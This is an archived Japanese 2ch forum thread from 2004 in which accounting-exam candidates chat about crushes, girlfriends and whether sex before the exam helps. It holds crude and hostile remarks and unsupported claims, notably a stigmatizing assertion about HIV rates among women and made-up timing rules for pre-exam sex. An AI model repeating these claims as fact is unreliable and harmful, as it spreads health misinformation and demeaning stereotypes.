429 :一般に公正妥当と認められた名無しさん:04/05/11 00:31 ID:???
今は恋どころじゃないよ。
恋なき人生はやっぱりつまらん。

430 :一般に公正妥当と認められた名無しさん:04/05/11 10:06 ID:5X6QZXGo
>>428
俺と同じ心境で直前期の授業を受けている奴がいるとはな。
お目当ての子が同一人物でないことを祈るよ。

ま、その子が野郎に話しかけられてる場面を幾度となく目撃している
のも事実。
専門によくいる女たちとは違って、知り合いを作ることにガツガツし
ていないところが余計に気になる存在だったんだが…。
でも、いざこういう状況になると、それがかえって消息(?)をつか
みづらくさせてるんだよな。


431 :一般に公正妥当と認められた名無しさん:04/05/11 16:05 ID:???
きもいなぁお前ら

432 :一般に公正妥当と認められた名無しさん:04/05/11 16:11 ID:???
受験と恋愛の両立に日夜苦しんでいる皆さん
または、予備校で仲良く席を並べるカップルに落ちろ落ちろと呪詛しながら勉強に励んでいる皆さん、
平松センセイの本質が判明したそうですのでどうぞ↓


みんなが訳も分からないまま平松さんに『遠慮する』ということが一番大きいのでしょうね。

関学の中では特にそうなのでしょうね。
http://hirazemi.hp.infoseek.co.jp/page002.htmlで関学の方々が「言わずと知れた」などと述べ、
平松さんの「すごさ」に疑問をはさむ余地を与えない書き方をしているのを見ると、なんとかくそう思います。
他大学の人間などが、それでも疑問をはさんできた時のために、研究業績も添えてはあるようですけど。
平松さんに研究業績が無いとは言いません。それなりにあることは知っています。

が、そういう人脈や、それなりにある業績、就いている要職などの
後光効果に頼るところが一番大きいでしょうね。
特に、あそこまで地位を確立すると、その威信により、地位が地位を生むという現象が生じます。
世間は肩書きが大好きですからね。なおさらです。

433 :一般に公正妥当と認められた名無しさん:04/05/11 17:27 ID:eIlqKWiR
とりあえずすぐやらせてくれる女ほしいナー

434 :一般に公正妥当と認められた名無しさん:04/05/11 19:42 ID:???
すぐやらしてくれる女のヒヴ・キャリアの率は高いよ。
検査無しでバンバンしている分、その辺の風俗嬢より高い。

435 :一般に公正妥当と認められた名無しさん:04/05/12 23:22 ID:E3ojA6IW
私の彼氏が会計士の資格とるために勉強しています。
いつも遅くまで勉強して大変そうです…。
ときどき、私が負担になっていないかなって不安に思うときがあります。


436 :一般に公正妥当と認められた名無しさん:04/05/12 23:32 ID:???
>>435
別れろ

437 :一般に公正妥当と認められた名無しさん:04/05/12 23:39 ID:ClLwUL5K
>>435
思いっきりネタっぽい

438 :一般に公正妥当と認められた名無しさん:04/05/13 21:11 ID:???
>>435
負担どころか、その存在に助けられているんじゃなかな。
この俺もそうだから。

439 :435:04/05/13 22:20 ID:uDUKodSh
>>438
そうですか!?
ちょっと元気でました。


440 :一般に公正妥当と認められた名無しさん:04/05/13 22:33 ID:???
>>439
なんでこの板に来てるんだ?

441 :一般に公正妥当と認められた名無しさん:04/05/16 23:15 ID:???
>>435
「私と勉強とどっちが大切なの?」とか言わない限りは負担にならないと
思うよ。

442 :一般に公正妥当と認められた名無しさん:04/05/18 01:46 ID:6qmfegzt
彼氏と電話してて時間が過ぎる・・・
もうこんな時間・・・
時間足りない、ばかだぁ私。。。
はやくやんなきゃ

443 :一般に公正妥当と認められた名無しさん:04/05/18 08:24 ID:???
鈴木真紀江が一番いい女なんです。

444 :一般に公正妥当と認められた名無しさん:04/05/18 09:46 ID:???
>>442
氏ね

445 :一般に公正妥当と認められた名無しさん:04/05/18 13:17 ID:zR6qYCJT
で、前日はセックスするの?
試験に影響するかな?


446 :一般に公正妥当と認められた名無しさん:04/05/18 14:26 ID:???
前日のセックスは試験に好影響をあたえるらしいよ。
ただ直前期にやりまくるのはよくないらしい。
あくまでも前日だけね

447 :一般に公正妥当と認められた名無しさん:04/05/18 14:56 ID:???
ちょっと違うな。
男は2日前(正確には約50時間前)、女は前日がいいらしいよ。

448 :一般に公正妥当と認められた名無しさん:04/05/19 23:08 ID:0W1JzAzN
>>447
どうして?心理的な問題??

101 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)